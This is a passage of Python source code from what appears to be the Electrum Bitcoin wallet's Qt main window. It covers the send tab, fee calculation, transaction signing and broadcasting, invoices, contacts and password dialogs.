grid.setSpacing(8) grid.setColumnStretch(3, 1) from .paytoedit import PayToEdit self.amount_e = BTCAmountEdit(self.get_decimal_point) self.payto_e = PayToEdit(self) msg = _('Recipient of the funds.') + '\n\n'\ + _('You may enter a Bitcoin address, a label from your list of contacts (a list of completions will be proposed), or an alias (email-like address that forwards to a Bitcoin address)') payto_label = HelpLabel(_('Pay to'), msg) grid.addWidget(payto_label, 1, 0) grid.addWidget(self.payto_e, 1, 1, 1, -1) completer = QCompleter() completer.setCaseSensitivity(False) self.payto_e.set_completer(completer) completer.setModel(self.completions) msg = _('Description of the transaction (not mandatory).') + '\n\n'\ + _('The description is not sent to the recipient of the funds. 
It is stored in your wallet file, and displayed in the \'History\' tab.') description_label = HelpLabel(_('Description'), msg) grid.addWidget(description_label, 2, 0) self.message_e = MyLineEdit() grid.addWidget(self.message_e, 2, 1, 1, -1) self.from_label = QLabel(_('From')) grid.addWidget(self.from_label, 3, 0) self.from_list = FromList(self, self.from_list_menu) grid.addWidget(self.from_list, 3, 1, 1, -1) self.set_pay_from([]) msg = _('Amount to be sent.') + '\n\n' \ + _('The amount will be displayed in red if you do not have enough funds in your wallet.') + ' ' \ + _('Note that if you have frozen some of your addresses, the available funds will be lower than your total balance.') + '\n\n' \ + _('Keyboard shortcut: type "!" to send all your coins.') amount_label = HelpLabel(_('Amount'), msg) grid.addWidget(amount_label, 4, 0) grid.addWidget(self.amount_e, 4, 1) self.fiat_send_e = AmountEdit(self.fx.get_currency if self.fx else '') if not self.fx or not self.fx.is_enabled(): self.fiat_send_e.setVisible(False) grid.addWidget(self.fiat_send_e, 4, 2) self.amount_e.frozen.connect( lambda: self.fiat_send_e.setFrozen(self.amount_e.isReadOnly())) self.max_button = EnterButton(_("Max"), self.spend_max) self.max_button.setFixedWidth(140) self.max_button.setCheckable(True) grid.addWidget(self.max_button, 4, 3) hbox = QHBoxLayout() hbox.addStretch(1) grid.addLayout(hbox, 4, 4) msg = _('Bitcoin transactions are in general not free. A transaction fee is paid by the sender of the funds.') + '\n\n'\ + _('The amount of fee can be decided freely by the sender. However, transactions with low fees take more time to be processed.') + '\n\n'\ + _('A suggested fee is automatically added to this field. You may override it. The suggested fee increases with the size of the transaction.') self.fee_e_label = HelpLabel(_('Fee'), msg) def fee_cb(dyn, pos, fee_rate): if dyn: if self.config.use_mempool_fees(): self.config.set_key('depth_level', pos, False) else: self.config.set_key('fee_level', pos, False) else: self.config.set_key('fee_per_kb', fee_rate, False) if fee_rate: fee_rate = Decimal(fee_rate) self.feerate_e.setAmount(quantize_feerate(fee_rate / 1000)) else: self.feerate_e.setAmount(None) self.fee_e.setModified(False) self.fee_slider.activate() self.spend_max() if self.max_button.isChecked() else self.update_fee() self.fee_slider = FeeSlider(self, self.config, fee_cb) self.fee_slider.setFixedWidth(140) def on_fee_or_feerate(edit_changed, editing_finished): edit_other = self.feerate_e if edit_changed == self.fee_e else self.fee_e if editing_finished: if edit_changed.get_amount() is None: # This is so that when the user blanks the fee and moves on, # we go back to auto-calculate mode and put a fee back. 
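                # Added note (not in the original source): exactly one of
                # fee_e / feerate_e acts as the user-frozen input at a time.
                # Blanking the edited box returns both to auto-calculated mode,
                # while a real edit un-freezes the *other* box so that
                # do_update_fee() recomputes it from this one.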
edit_changed.setModified(False) else: # edit_changed was edited just now, so make sure we will # freeze the correct fee setting (this) edit_other.setModified(False) self.fee_slider.deactivate() self.update_fee() class TxSizeLabel(QLabel): def setAmount(self, byte_size): self.setText(('x %s bytes =' % byte_size) if byte_size else '') self.size_e = TxSizeLabel() self.size_e.setAlignment(Qt.AlignCenter) self.size_e.setAmount(0) self.size_e.setFixedWidth(140) self.size_e.setStyleSheet(ColorScheme.DEFAULT.as_stylesheet()) self.feerate_e = FeerateEdit(lambda: 0) self.feerate_e.setAmount(self.config.fee_per_byte()) self.feerate_e.textEdited.connect(partial(on_fee_or_feerate, self.feerate_e, False)) self.feerate_e.editingFinished.connect(partial(on_fee_or_feerate, self.feerate_e, True)) self.fee_e = BTCAmountEdit(self.get_decimal_point) self.fee_e.textEdited.connect(partial(on_fee_or_feerate, self.fee_e, False)) self.fee_e.editingFinished.connect(partial(on_fee_or_feerate, self.fee_e, True)) def feerounding_onclick(): text = (self.feerounding_text + '\n\n' + _('To somewhat protect your privacy, Electrum tries to create change with similar precision to other outputs.') + ' ' + _('At most 100 satoshis might be lost due to this rounding.') + ' ' + _("You can disable this setting in '{}'.").format(_('Preferences')) + '\n' + _('Also, dust is not kept as change, but added to the fee.') + '\n' + _('Also, when batching RBF transactions, BIP 125 imposes a lower bound on the fee.')) self.show_message(title=_('Fee rounding'), msg=text) self.feerounding_icon = QPushButton(read_QIcon('info.png'), '') self.feerounding_icon.setFixedWidth(20) self.feerounding_icon.setFlat(True) self.feerounding_icon.clicked.connect(feerounding_onclick) self.feerounding_icon.setVisible(False) self.connect_fields(self, self.amount_e, self.fiat_send_e, self.fee_e) vbox_feelabel = QVBoxLayout() vbox_feelabel.addWidget(self.fee_e_label) vbox_feelabel.addStretch(1) grid.addLayout(vbox_feelabel, 5, 0) self.fee_adv_controls = QWidget() hbox = QHBoxLayout(self.fee_adv_controls) hbox.setContentsMargins(0, 0, 0, 0) hbox.addWidget(self.feerate_e) hbox.addWidget(self.size_e) hbox.addWidget(self.fee_e) hbox.addWidget(self.feerounding_icon, Qt.AlignLeft) hbox.addStretch(1) vbox_feecontrol = QVBoxLayout() vbox_feecontrol.addWidget(self.fee_adv_controls) vbox_feecontrol.addWidget(self.fee_slider) grid.addLayout(vbox_feecontrol, 5, 1, 1, -1) if not self.config.get('show_fee', False): self.fee_adv_controls.setVisible(False) self.preview_button = EnterButton(_("Preview"), self.do_preview) self.preview_button.setToolTip(_('Display the details of your transaction before signing it.')) self.send_button = EnterButton(_("Send"), self.do_send) self.clear_button = EnterButton(_("Clear"), self.do_clear) buttons = QHBoxLayout() buttons.addStretch(1) buttons.addWidget(self.clear_button) buttons.addWidget(self.preview_button) buttons.addWidget(self.send_button) grid.addLayout(buttons, 6, 1, 1, 3) self.amount_e.shortcut.connect(self.spend_max) self.payto_e.textChanged.connect(self.update_fee) self.amount_e.textEdited.connect(self.update_fee) def reset_max(text): self.max_button.setChecked(False) enable = not bool(text) and not self.amount_e.isReadOnly() self.max_button.setEnabled(enable) self.amount_e.textEdited.connect(reset_max) self.fiat_send_e.textEdited.connect(reset_max) def entry_changed(): text = "" amt_color = ColorScheme.DEFAULT fee_color = ColorScheme.DEFAULT feerate_color = ColorScheme.DEFAULT if self.not_enough_funds: amt_color, fee_color = 
ColorScheme.RED, ColorScheme.RED feerate_color = ColorScheme.RED text = _("Not enough funds") c, u, x = self.wallet.get_frozen_balance() if c+u+x: text += " ({} {} {})".format( self.format_amount(c + u + x).strip(), self.base_unit(), _("are frozen") ) # blue color denotes auto-filled values elif self.fee_e.isModified(): feerate_color = ColorScheme.BLUE elif self.feerate_e.isModified(): fee_color = ColorScheme.BLUE elif self.amount_e.isModified(): fee_color = ColorScheme.BLUE feerate_color = ColorScheme.BLUE else: amt_color = ColorScheme.BLUE fee_color = ColorScheme.BLUE feerate_color = ColorScheme.BLUE self.statusBar().showMessage(text) self.amount_e.setStyleSheet(amt_color.as_stylesheet()) self.fee_e.setStyleSheet(fee_color.as_stylesheet()) self.feerate_e.setStyleSheet(feerate_color.as_stylesheet()) self.amount_e.textChanged.connect(entry_changed) self.fee_e.textChanged.connect(entry_changed) self.feerate_e.textChanged.connect(entry_changed) self.invoices_label = QLabel(_('Invoices')) from .invoice_list import InvoiceList self.invoice_list = InvoiceList(self) vbox0 = QVBoxLayout() vbox0.addLayout(grid) hbox = QHBoxLayout() hbox.addLayout(vbox0) w = QWidget() vbox = QVBoxLayout(w) vbox.addLayout(hbox) vbox.addStretch(1) vbox.addWidget(self.invoices_label) vbox.addWidget(self.invoice_list) vbox.setStretchFactor(self.invoice_list, 1000) w.searchable_list = self.invoice_list run_hook('create_send_tab', grid) return w def spend_max(self): if run_hook('abort_send', self): return self.max_button.setChecked(True) self.do_update_fee() def update_fee(self): self.require_fee_update = True def get_payto_or_dummy(self): r = self.payto_e.get_recipient() if r: return r return (TYPE_ADDRESS, self.wallet.dummy_address()) def do_update_fee(self): '''Recalculate the fee. If the fee was manually input, retain it, but still build the TX to see if there are enough funds. ''' freeze_fee = self.is_send_fee_frozen() freeze_feerate = self.is_send_feerate_frozen() amount = '!' if self.max_button.isChecked() else self.amount_e.get_amount() if amount is None: if not freeze_fee: self.fee_e.setAmount(None) self.not_enough_funds = False self.statusBar().showMessage('') return outputs, fee_estimator, tx_desc, coins = self.read_send_tab() if not outputs: _type, addr = self.get_payto_or_dummy() outputs = [TxOutput(_type, addr, amount)] is_sweep = bool(self.tx_external_keypairs) make_tx = lambda fee_est: \ self.wallet.make_unsigned_transaction( coins, outputs, self.config, fixed_fee=fee_est, is_sweep=is_sweep) try: tx = make_tx(fee_estimator) self.not_enough_funds = False except (NotEnoughFunds, NoDynamicFeeEstimates) as e: if not freeze_fee: self.fee_e.setAmount(None) if not freeze_feerate: self.feerate_e.setAmount(None) self.feerounding_icon.setVisible(False) if isinstance(e, NotEnoughFunds): self.not_enough_funds = True elif isinstance(e, NoDynamicFeeEstimates): try: tx = make_tx(0) size = tx.estimated_size() self.size_e.setAmount(size) except BaseException: pass return except BaseException: self.logger.exception('') return size = tx.estimated_size() self.size_e.setAmount(size) fee = tx.get_fee() fee = None if self.not_enough_funds else fee # Displayed fee/fee_rate values are set according to user input. # Due to rounding or dropping dust in CoinChooser, # actual fees often differ somewhat. 
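        # Added worked example with assumed numbers (not in the original source):
        # with a frozen feerate of 50 sat/byte and an estimated size of 225 bytes,
        # the displayed fee below becomes round(50 * 225) = 11250 sat; conversely,
        # when the absolute fee is frozen, the feerate is derived as fee / size
        # and quantized via quantize_feerate().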
if freeze_feerate or self.fee_slider.is_active(): displayed_feerate = self.feerate_e.get_amount() if displayed_feerate is not None: displayed_feerate = quantize_feerate(displayed_feerate) else: # fallback to actual fee displayed_feerate = quantize_feerate(fee / size) if fee is not None else None self.feerate_e.setAmount(displayed_feerate) displayed_fee = round(displayed_feerate * size) if displayed_feerate is not None else None self.fee_e.setAmount(displayed_fee) else: if freeze_fee: displayed_fee = self.fee_e.get_amount() else: # fallback to actual fee if nothing is frozen displayed_fee = fee self.fee_e.setAmount(displayed_fee) displayed_fee = displayed_fee if displayed_fee else 0 displayed_feerate = quantize_feerate(displayed_fee / size) if displayed_fee is not None else None self.feerate_e.setAmount(displayed_feerate) # show/hide fee rounding icon feerounding = (fee - displayed_fee) if fee else 0 self.set_feerounding_text(int(feerounding)) self.feerounding_icon.setToolTip(self.feerounding_text) self.feerounding_icon.setVisible(abs(feerounding) >= 1) if self.max_button.isChecked(): amount = tx.output_value() __, x_fee_amount = run_hook('get_tx_extra_fee', self.wallet, tx) or (None, 0) amount_after_all_fees = amount - x_fee_amount self.amount_e.setAmount(amount_after_all_fees) def from_list_delete(self, item): i = self.from_list.indexOfTopLevelItem(item) self.pay_from.pop(i) self.redraw_from_list() self.update_fee() def from_list_menu(self, position): item = self.from_list.itemAt(position) menu = QMenu() menu.addAction(_("Remove"), lambda: self.from_list_delete(item)) menu.exec_(self.from_list.viewport().mapToGlobal(position)) def set_pay_from(self, coins): self.pay_from = list(coins) self.redraw_from_list() def redraw_from_list(self): self.from_list.clear() self.from_label.setHidden(len(self.pay_from) == 0) self.from_list.setHidden(len(self.pay_from) == 0) def format(x): h = x.get('prevout_hash') return h[0:10] + '...' + h[-10:] + ":%d"%x.get('prevout_n') + u'\t' + "%s"%x.get('address') for item in self.pay_from: self.from_list.addTopLevelItem(QTreeWidgetItem( [format(item), self.format_amount(item['value']) ])) def get_contact_payto(self, key): _type, label = self.contacts.get(key) return label + ' <' + key + '>' if _type == 'address' else key def update_completions(self): l = [self.get_contact_payto(key) for key in self.contacts.keys()] self.completions.setStringList(l) def protected(func): '''Password request wrapper. The password is passed to the function as the 'password' named argument. "None" indicates either an unencrypted wallet, or the user cancelled the password request. 
An empty input is passed as the empty string.''' def request_password(self, *args, **kwargs): parent = self.top_level_window() password = None while self.wallet.has_keystore_encryption(): password = self.password_dialog(parent=parent) if password is None: # User cancelled password input return try: self.wallet.check_password(password) break except Exception as e: self.show_error(str(e), parent=parent) continue kwargs['password'] = password return func(self, *args, **kwargs) return request_password def is_send_fee_frozen(self): return self.fee_e.isVisible() and self.fee_e.isModified() \ and (self.fee_e.text() or self.fee_e.hasFocus()) def is_send_feerate_frozen(self): return self.feerate_e.isVisible() and self.feerate_e.isModified() \ and (self.feerate_e.text() or self.feerate_e.hasFocus()) def get_send_fee_estimator(self): if self.is_send_fee_frozen(): fee_estimator = self.fee_e.get_amount() elif self.is_send_feerate_frozen(): amount = self.feerate_e.get_amount() # sat/byte feerate amount = 0 if amount is None else amount * 1000 # sat/kilobyte feerate fee_estimator = partial( simple_config.SimpleConfig.estimate_fee_for_feerate, amount) else: fee_estimator = None return fee_estimator def read_send_tab(self): label = self.message_e.text() if self.payment_request: outputs = self.payment_request.get_outputs() else: outputs = self.payto_e.get_outputs(self.max_button.isChecked()) fee_estimator = self.get_send_fee_estimator() coins = self.get_coins() return outputs, fee_estimator, label, coins def check_send_tab_outputs_and_show_errors(self, outputs) -> bool: """Returns whether there are errors with outputs. Also shows error dialog to user if so. """ pr = self.payment_request if pr: if pr.has_expired(): self.show_error(_('Payment request has expired')) return True if not pr: errors = self.payto_e.get_errors() if errors: self.show_warning(_("Invalid Lines found:") + "\n\n" + '\n'.join([ _("Line #") + str(x[0]+1) + ": " + x[1] for x in errors])) return True if self.payto_e.is_alias and self.payto_e.validated is False: alias = self.payto_e.toPlainText() msg = _('WARNING: the alias "{}" could not be validated via an additional ' 'security check, DNSSEC, and thus may not be correct.').format(alias) + '\n' msg += _('Do you wish to continue?') if not self.question(msg): return True if not outputs: self.show_error(_('No outputs')) return True for o in outputs: if o.address is None: self.show_error(_('Bitcoin Address is None')) return True if o.type == TYPE_ADDRESS and not bitcoin.is_address(o.address): self.show_error(_('Invalid Bitcoin Address')) return True if o.value is None: self.show_error(_('Invalid Amount')) return True return False # no errors def do_preview(self): self.do_send(preview = True) def do_send(self, preview = False): if run_hook('abort_send', self): return outputs, fee_estimator, tx_desc, coins = self.read_send_tab() if self.check_send_tab_outputs_and_show_errors(outputs): return try: is_sweep = bool(self.tx_external_keypairs) tx = self.wallet.make_unsigned_transaction( coins, outputs, self.config, fixed_fee=fee_estimator, is_sweep=is_sweep) except (NotEnoughFunds, NoDynamicFeeEstimates) as e: self.show_message(str(e)) return except InternalAddressCorruption as e: self.show_error(str(e)) raise except BaseException as e: self.logger.exception('') self.show_message(str(e)) return amount = tx.output_value() if self.max_button.isChecked() else sum(map(lambda x:x[2], outputs)) fee = tx.get_fee() use_rbf = self.config.get('use_rbf', True) if use_rbf: tx.set_rbf(True) if fee < 
self.wallet.relayfee() * tx.estimated_size() / 1000: self.show_error('\n'.join([ _("This transaction requires a higher fee, or it will not be propagated by your current server"), _("Try to raise your transaction fee, or use a server with a lower relay fee.") ])) return if preview: self.show_transaction(tx, tx_desc) return if not self.network: self.show_error(_("You can't broadcast a transaction without a live network connection.")) return # confirmation dialog msg = [ _("Amount to be sent") + ": " + self.format_amount_and_units(amount), _("Mining fee") + ": " + self.format_amount_and_units(fee), ] x_fee = run_hook('get_tx_extra_fee', self.wallet, tx) if x_fee: x_fee_address, x_fee_amount = x_fee msg.append( _("Additional fees") + ": " + self.format_amount_and_units(x_fee_amount) ) feerate_warning = simple_config.FEERATE_WARNING_HIGH_FEE if fee > feerate_warning * tx.estimated_size() / 1000: msg.append(_('Warning') + ': ' + _("The fee for this transaction seems unusually high.")) if self.wallet.has_keystore_encryption(): msg.append("") msg.append(_("Enter your password to proceed")) password = self.password_dialog('\n'.join(msg)) if not password: return else: msg.append(_('Proceed?')) password = None if not self.question('\n'.join(msg)): return def sign_done(success): if success: if not tx.is_complete(): self.show_transaction(tx) self.do_clear() else: self.broadcast_transaction(tx, tx_desc) self.sign_tx_with_password(tx, sign_done, password) @protected def sign_tx(self, tx, callback, password): self.sign_tx_with_password(tx, callback, password) def sign_tx_with_password(self, tx, callback, password): '''Sign the transaction in a separate thread. When done, calls the callback with a success code of True or False. ''' def on_success(result): callback(True) def on_failure(exc_info): self.on_error(exc_info) callback(False) on_success = run_hook('tc_sign_wrapper', self.wallet, tx, on_success, on_failure) or on_success if self.tx_external_keypairs: # can sign directly task = partial(Transaction.sign, tx, self.tx_external_keypairs) else: task = partial(self.wallet.sign_transaction, tx, password) msg = _('Signing transaction...') WaitingDialog(self, msg, task, on_success, on_failure) def broadcast_transaction(self, tx, tx_desc): def broadcast_thread(): # non-GUI thread pr = self.payment_request if pr and pr.has_expired(): self.payment_request = None return False, _("Payment request has expired") status = False try: self.network.run_from_another_thread(self.network.broadcast_transaction(tx)) except TxBroadcastError as e: msg = e.get_message_for_gui() except BestEffortRequestFailed as e: msg = repr(e) else: status, msg = True, tx.txid() if pr and status is True: self.invoices.set_paid(pr, tx.txid()) self.invoices.save() self.payment_request = None refund_address = self.wallet.get_receiving_address() coro = pr.send_payment_and_receive_paymentack(str(tx), refund_address) fut = asyncio.run_coroutine_threadsafe(coro, self.network.asyncio_loop) ack_status, ack_msg = fut.result(timeout=20) self.logger.info(f"Payment ACK: {ack_status}. 
Ack message: {ack_msg}") return status, msg # Capture current TL window; override might be removed on return parent = self.top_level_window(lambda win: isinstance(win, MessageBoxMixin)) def broadcast_done(result): # GUI thread if result: status, msg = result if status: if tx_desc is not None and tx.is_complete(): self.wallet.set_label(tx.txid(), tx_desc) parent.show_message(_('Payment sent.') + '\n' + msg) self.invoice_list.update() self.do_clear() else: msg = msg or '' parent.show_error(msg) WaitingDialog(self, _('Broadcasting transaction...'), broadcast_thread, broadcast_done, self.on_error) def query_choice(self, msg, choices): # Needed by QtHandler for hardware wallets dialog = WindowModalDialog(self.top_level_window()) clayout = ChoicesLayout(msg, choices) vbox = QVBoxLayout(dialog) vbox.addLayout(clayout.layout()) vbox.addLayout(Buttons(OkButton(dialog))) if not dialog.exec_(): return None return clayout.selected_index() def lock_amount(self, b): self.amount_e.setFrozen(b) self.max_button.setEnabled(not b) def prepare_for_payment_request(self): self.show_send_tab() self.payto_e.is_pr = True for e in [self.payto_e, self.message_e]: e.setFrozen(True) self.lock_amount(True) self.payto_e.setText(_("please wait...")) return True def delete_invoice(self, key): self.invoices.remove(key) self.invoice_list.update() def payment_request_ok(self): pr = self.payment_request if not pr: return key = self.invoices.add(pr) status = self.invoices.get_status(key) self.invoice_list.update() if status == PR_PAID: self.show_message("invoice already paid") self.do_clear() self.payment_request = None return self.payto_e.is_pr = True if not pr.has_expired(): self.payto_e.setGreen() else: self.payto_e.setExpired() self.payto_e.setText(pr.get_requestor()) self.amount_e.setText(format_satoshis_plain(pr.get_amount(), self.decimal_point)) self.message_e.setText(pr.get_memo()) # signal to set fee self.amount_e.textEdited.emit("") def payment_request_error(self): pr = self.payment_request if not pr: return self.show_message(pr.error) self.payment_request = None self.do_clear() def on_pr(self, request): self.payment_request = request if self.payment_request.verify(self.contacts): self.payment_request_ok_signal.emit() else: self.payment_request_error_signal.emit() def pay_to_URI(self, URI): if not URI: return try: out = util.parse_URI(URI, self.on_pr) except InvalidBitcoinURI as e: self.show_error(_("Error parsing URI") + f":\n{e}") return self.show_send_tab() r = out.get('r') sig = out.get('sig') name = out.get('name') if r or (name and sig): self.prepare_for_payment_request() return address = out.get('address') amount = out.get('amount') label = out.get('label') message = out.get('message') # use label as description (not BIP21 compliant) if label and not message: message = label if address: self.payto_e.setText(address) if message: self.message_e.setText(message) if amount: self.amount_e.setAmount(amount) self.amount_e.textEdited.emit("") def do_clear(self): self.max_button.setChecked(False) self.not_enough_funds = False self.payment_request = None self.payto_e.is_pr = False for e in [self.payto_e, self.message_e, self.amount_e, self.fiat_send_e, self.fee_e, self.feerate_e]: e.setText('') e.setFrozen(False) self.fee_slider.activate() self.feerate_e.setAmount(self.config.fee_per_byte()) self.size_e.setAmount(0) self.feerounding_icon.setVisible(False) self.set_pay_from([]) self.tx_external_keypairs = {} self.update_status() run_hook('do_clear', self) def set_frozen_state_of_addresses(self, addrs, freeze: bool): 
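        # Added note (not in the original source): freezing is delegated to the
        # wallet, then the address/UTXO views and the fee estimate are refreshed,
        # since frozen addresses are excluded from the spendable coins that
        # do_update_fee() draws on.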
self.wallet.set_frozen_state_of_addresses(addrs, freeze) self.address_list.update() self.utxo_list.update() self.update_fee() def set_frozen_state_of_coins(self, utxos, freeze: bool): self.wallet.set_frozen_state_of_coins(utxos, freeze) self.utxo_list.update() self.update_fee() def create_list_tab(self, l, toolbar=None): w = QWidget() w.searchable_list = l vbox = QVBoxLayout() w.setLayout(vbox) vbox.setContentsMargins(0, 0, 0, 0) vbox.setSpacing(0) if toolbar: vbox.addLayout(toolbar) vbox.addWidget(l) return w def create_addresses_tab(self): from .address_list import AddressList self.address_list = l = AddressList(self) toolbar = l.create_toolbar(self.config) toolbar_shown = self.config.get('show_toolbar_addresses', False) l.show_toolbar(toolbar_shown) return self.create_list_tab(l, toolbar) def create_utxo_tab(self): from .utxo_list import UTXOList self.utxo_list = l = UTXOList(self) return self.create_list_tab(l) def create_contacts_tab(self): from .contact_list import ContactList self.contact_list = l = ContactList(self) return self.create_list_tab(l) def remove_address(self, addr): if self.question(_("Do you want to remove {} from your wallet?").format(addr)): self.wallet.delete_address(addr) self.need_update.set() # history, addresses, coins self.clear_receive_tab() def get_coins(self): if self.pay_from: return self.pay_from else: return self.wallet.get_spendable_coins(None, self.config) def spend_coins(self, coins): self.set_pay_from(coins) self.show_send_tab() self.update_fee() def paytomany(self): self.show_send_tab() self.payto_e.paytomany() msg = '\n'.join([ _('Enter a list of outputs in the \'Pay to\' field.'), _('One output per line.'), _('Format: address, amount'), _('You may load a CSV file using the file icon.') ]) self.show_message(msg, title=_('Pay to many')) def payto_contacts(self, labels): paytos = [self.get_contact_payto(label) for label in labels] self.show_send_tab() if len(paytos) == 1: self.payto_e.setText(paytos[0]) self.amount_e.setFocus() else: text = "\n".join([payto + ", 0" for payto in paytos]) self.payto_e.setText(text) self.payto_e.setFocus() def set_contact(self, label, address): if not is_address(address): self.show_error(_('Invalid Address')) self.contact_list.update() # Displays original unchanged value return False self.contacts[address] = ('address', label) self.contact_list.update() self.history_list.update() self.update_completions() return True def delete_contacts(self, labels): if not self.question(_("Remove {} from your list of contacts?") .format(" + ".join(labels))): return for label in labels: self.contacts.pop(label) self.history_list.update() self.contact_list.update() self.update_completions() def show_invoice(self, key): pr = self.invoices.get(key) if pr is None: self.show_error('Cannot find payment request in wallet.') return pr.verify(self.contacts) self.show_pr_details(pr) def show_pr_details(self, pr): key = pr.get_id() d = WindowModalDialog(self, _("Invoice")) vbox = QVBoxLayout(d) grid = QGridLayout() grid.addWidget(QLabel(_("Requestor") + ':'), 0, 0) grid.addWidget(QLabel(pr.get_requestor()), 0, 1) grid.addWidget(QLabel(_("Amount") + ':'), 1, 0) outputs_str = '\n'.join(map(lambda x: self.format_amount(x[2])+ self.base_unit() + ' @ ' + x[1], pr.get_outputs())) grid.addWidget(QLabel(outputs_str), 1, 1) expires = pr.get_expiration_date() grid.addWidget(QLabel(_("Memo") + ':'), 2, 0) grid.addWidget(QLabel(pr.get_memo()), 2, 1) grid.addWidget(QLabel(_("Signature") + ':'), 3, 0) grid.addWidget(QLabel(pr.get_verify_status()), 3, 1) if 
expires:
            grid.addWidget(QLabel(_("Expires") + ':'), 4, 0)
            grid.addWidget(QLabel(format_time(expires)), 4, 1)
        vbox.addLayout(grid)

        def do_export():
            name = str(key) + '.bip70'
            fn = self.getSaveFileName(_("Save invoice to file"), name, filter="*.bip70")
            if not fn:
                return
            with open(fn, 'wb') as f:
                f.write(pr.raw)  # the number of bytes written is not needed; don't bind it to an unused name
            # translate only the fixed phrase; the filename must stay outside the _() lookup
            self.show_message(_('Invoice saved as') + ' ' + fn)

        exportButton = EnterButton(_('Save'), do_export)

        def do_delete():
            if self.question(_('Delete invoice?')):
                self.invoices.remove(key)
                self.history_list.update()
                self.invoice_list.update()
                d.close()

        deleteButton = EnterButton(_('Delete'), do_delete)
        vbox.addLayout(Buttons(exportButton, deleteButton, CloseButton(d)))
        d.exec_()

    def do_pay_invoice(self, key):
        pr = self.invoices.get(key)
        self.payment_request = pr
        self.prepare_for_payment_request()
        pr.error = None  # this forces verify() to re-run
        if pr.verify(self.contacts):
            self.payment_request_ok()
        else:
            self.payment_request_error()

    def create_console_tab(self):
        from .console import Console
        self.console = console = Console()
        return console

    def update_console(self):
        console = self.console
        console.history = self.config.get("console-history", [])
        console.history_index = len(console.history)
        console.updateNamespace({
            'wallet': self.wallet,
            'network': self.network,
            'plugins': self.gui_object.plugins,
            'window': self,
            'config': self.config,
            'electrum': electrum,
            'daemon': self.gui_object.daemon,
            'util': util,
            'bitcoin': bitcoin,
        })
        c = commands.Commands(self.config, self.wallet, self.network, lambda: self.console.set_json(True))
        methods = {}
        def mkfunc(f, method):
            return lambda *args: f(method, args, self.password_dialog)
        for m in dir(c):
            if m[0] == '_' or m in ['network', 'wallet', 'config']:
                continue
            methods[m] = mkfunc(c._run, m)
        console.updateNamespace(methods)

    def create_status_bar(self):
        sb = QStatusBar()
        sb.setFixedHeight(35)
        self.balance_label = QLabel("Loading wallet...")
        self.balance_label.setTextInteractionFlags(Qt.TextSelectableByMouse)
        self.balance_label.setStyleSheet("""QLabel { padding: 0 }""")
        sb.addWidget(self.balance_label)
        self.search_box = QLineEdit()
        self.search_box.textChanged.connect(self.do_search)
        self.search_box.hide()
        sb.addPermanentWidget(self.search_box)
        self.update_check_button = QPushButton("")
        self.update_check_button.setFlat(True)
        self.update_check_button.setCursor(QCursor(Qt.PointingHandCursor))
        self.update_check_button.setIcon(read_QIcon("update.png"))
        self.update_check_button.hide()
        sb.addPermanentWidget(self.update_check_button)
        self.password_button = StatusBarButton(QIcon(), _("Password"), self.change_password_dialog)
        sb.addPermanentWidget(self.password_button)
        sb.addPermanentWidget(StatusBarButton(read_QIcon("preferences.png"), _("Preferences"), self.settings_dialog))
        self.seed_button = StatusBarButton(read_QIcon("seed.png"), _("Seed"), self.show_seed_dialog)
        sb.addPermanentWidget(self.seed_button)
        self.status_button = StatusBarButton(read_QIcon("status_disconnected.png"), _("Network"), lambda: self.gui_object.show_network_dialog(self))
        sb.addPermanentWidget(self.status_button)
        run_hook('create_status_bar', sb)
        self.setStatusBar(sb)

    def update_lock_icon(self):
        icon = read_QIcon("lock.png") if self.wallet.has_password() else read_QIcon("unlock.png")
        self.password_button.setIcon(icon)

    def update_buttons_on_seed(self):
        self.seed_button.setVisible(self.wallet.has_seed())
        self.password_button.setVisible(self.wallet.may_have_password())
        self.send_button.setVisible(not self.wallet.is_watching_only())

    def change_password_dialog(self):
        from electrum.storage
import STO_EV_XPUB_PW if self.wallet.get_available_storage_encryption_version() == STO_EV_XPUB_PW: from .password_dialog import ChangePasswordDialogForHW d = ChangePasswordDialogForHW(self, self.wallet) ok, encrypt_file = d.run() if not ok: return try: hw_dev_pw = self.wallet.keystore.get_password_for_storage_encryption() except UserCancelled: return except BaseException as e: self.logger.exception('') self.show_error(str(e)) return old_password = hw_dev_pw if self.wallet.has_password() else None new_password = hw_dev_pw if encrypt_file else None else: from .password_dialog import ChangePasswordDialogForSW d = ChangePasswordDialogForSW(self, self.wallet) ok, old_password, new_password, encrypt_file = d.run() if not ok: return try: self.wallet.update_password(old_password, new_password, encrypt_file) except InvalidPassword as e: self.show_error(str(e)) return except BaseException: self.logger.exception('Failed to update password') self.show_error(_('Failed to update password')) return msg = _('Password was updated successfully') if self.wallet.has_password() else _('Password is disabled, this wallet is not protected') self.show_message(msg, title=_("Success")) self.update_lock_icon() def toggle_search(self): tab = self.tabs.currentWidget() #if hasattr(tab, 'searchable_list'): # tab.searchable_list.toggle_toolbar() #return self.search_box.setHidden(not self.search_box.isHidden()) if not self.search_box.isHidden(): self.search_box.setFocus(1) else: self.do_search('') def do_search(self, t): tab = self.tabs.currentWidget() if hasattr(tab, 'searchable_list'): tab.searchable_list.filter(t) def new_contact_dialog(self): d = WindowModalDialog(self, _("New Contact")) vbox = QVBoxLayout(d) vbox.addWidget(QLabel(_('New Contact') + ':')) grid = QGridLayout() line1 = QLineEdit() line1.setFixedWidth(280) line2 = QLineEdit() line2.setFixedWidth(280) grid.addWidget(QLabel(_("Address")), 1, 0) grid.addWidget(line1, 1, 1) grid.addWidget(QLabel(_("Name")), 2, 0) grid.addWidget(line2, 2, 1) vbox.addLayout(grid) vbox.addLayout(Buttons(CancelButton(d), OkButton(d))) if d.exec_(): self.set_contact(line2.text(), line1.text()) def show_master_public_keys(self): dialog = WindowModalDialog(self, _("Wallet Information")) dialog.setMinimumSize(500, 100) mpk_list = self.wallet.get_master_public_keys() vbox = QVBoxLayout() wallet_type = self.wallet.storage.get('wallet_type', '') if self.wallet.is_watching_only(): wallet_type += ' [{}]'.format(_('watching-only')) seed_available = _('True') if self.wallet.has_seed() else _('False') keystore_types = [k.get_type_text() for k in self.wallet.get_keystores()] grid = QGridLayout() basename = os.path.basename(self.wallet.storage.path) grid.addWidget(QLabel(_("Wallet name")+ ':'), 0, 0) grid.addWidget(QLabel(basename), 0, 1) grid.addWidget(QLabel(_("Wallet type")+ ':'), 1, 0) grid.addWidget(QLabel(wallet_type), 1, 1) grid.addWidget(QLabel(_("Script type")+ ':'), 2, 0) grid.addWidget(QLabel(self.wallet.txin_type), 2, 1) grid.addWidget(QLabel(_("Seed available") + ':'), 3, 0) grid.addWidget(QLabel(str(seed_available)), 3, 1) if len(keystore_types) <= 1: 